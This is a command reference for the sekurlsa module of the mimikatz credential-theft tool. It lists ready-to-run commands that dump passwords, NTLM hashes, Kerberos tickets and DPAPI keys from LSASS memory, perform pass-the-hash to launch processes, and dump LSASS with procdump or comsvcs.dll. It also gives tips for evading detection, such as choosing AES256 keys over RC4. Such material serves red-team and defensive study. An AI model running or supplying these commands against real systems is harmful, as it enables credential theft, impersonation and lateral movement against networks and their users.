sekurlsa
Extract passwords, keys, PIN codes, and Kerberos tickets from LSASS memory. Requires privilege::debug first (or SYSTEM access).
Prerequisites
mimikatz # privilege::debug
Privilege '20' OK
Without proper access: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
logonpasswords
Dump all cached credentials from all authentication providers (MSV, WDigest, Kerberos, TsPkg, CredMan, SSP).
mimikatz # sekurlsa::logonpasswords
Output includes:
- NTLM hashes (MSV)
- Cleartext passwords (WDigest β if enabled)
- Kerberos tickets and keys
- CredSSP credentials
Note: Windows 8+ disables WDigest cleartext caching by default. Passwords appear only when:
- Domain controller is unreachable at logon time
- HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 1
- CredSSP delegation is configured
pth β Pass-the-Hash
Execute a process using NTLM hash (creates sacrificial logon session, patches LSASS).
mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<nt-hash> [/aes128:<aes128-key>] [/aes256:<aes256-key>] [/run:<command>]
Options
/user:<username>β username to impersonate/domain:<domain>β domain or machine name/ntlm:<nt-hash>β NTLM/RC4 hash (mandatory for legacy)/rc4:<rc4>β alias for/ntlm/aes128:<aes128-key>β optional AES128 key/aes256:<aes256-key>β optional AES256 key (use for stealth)/run:<command>β command to execute (default:cmd.exe)
Examples
mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<nt-hash>
mimikatz # sekurlsa::pth /user:Administrator /domain:<domain> /ntlm:<nt-hash> /run:powershell.exe
mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /aes256:<aes256-key>
Requires admin rights β opens write handle to LSASS.
tickets
List and optionally export Kerberos tickets from all sessions.
mimikatz # sekurlsa::tickets [/export]
/exportβ save each ticket as a.kirbifile on disk
ekeys
Display all Kerberos encryption keys (AES256, AES128, RC4) for all sessions. Useful for obtaining AES keys for stealth over-pass-the-hash.
mimikatz # sekurlsa::ekeys
dpapi
Extract DPAPI master keys from LSASS session memory.
mimikatz # sekurlsa::dpapi
minidump
Redirect sekurlsa commands to work against an LSASS memory dump file instead of the live process.
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords
Dump LSASS first (various methods):
# Task Manager: right-click lsass.exe -> Create dump file
# ProcDump:
procdump.exe -ma lsass.exe lsass.dmp
# Comsvcs.dll:
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass-pid> lsass.dmp full
Credential-Specific Subcommands
mimikatz # sekurlsa::msv # MSV1_0 (NTLM) hashes only
mimikatz # sekurlsa::wdigest # WDigest cleartext passwords
mimikatz # sekurlsa::kerberos # Kerberos credentials + smartcard PINs
mimikatz # sekurlsa::tspkg # Terminal Services (CredSSP) credentials
mimikatz # sekurlsa::credman # Windows Credential Manager entries
mimikatz # sekurlsa::ssp # Security Support Provider credentials
mimikatz # sekurlsa::livessp # LiveSSP credentials
mimikatz # sekurlsa::searchpasswords # Keyword search in memory for passwords
Notes
- Credential Guard prevents all credential extraction via sekurlsa
sekurlsa::ekeysreturns all Kerberos key types β use AES256 over RC4 to avoid encryption downgrade detection- When using against a minidump, must specify the dump file path before running other sekurlsa commands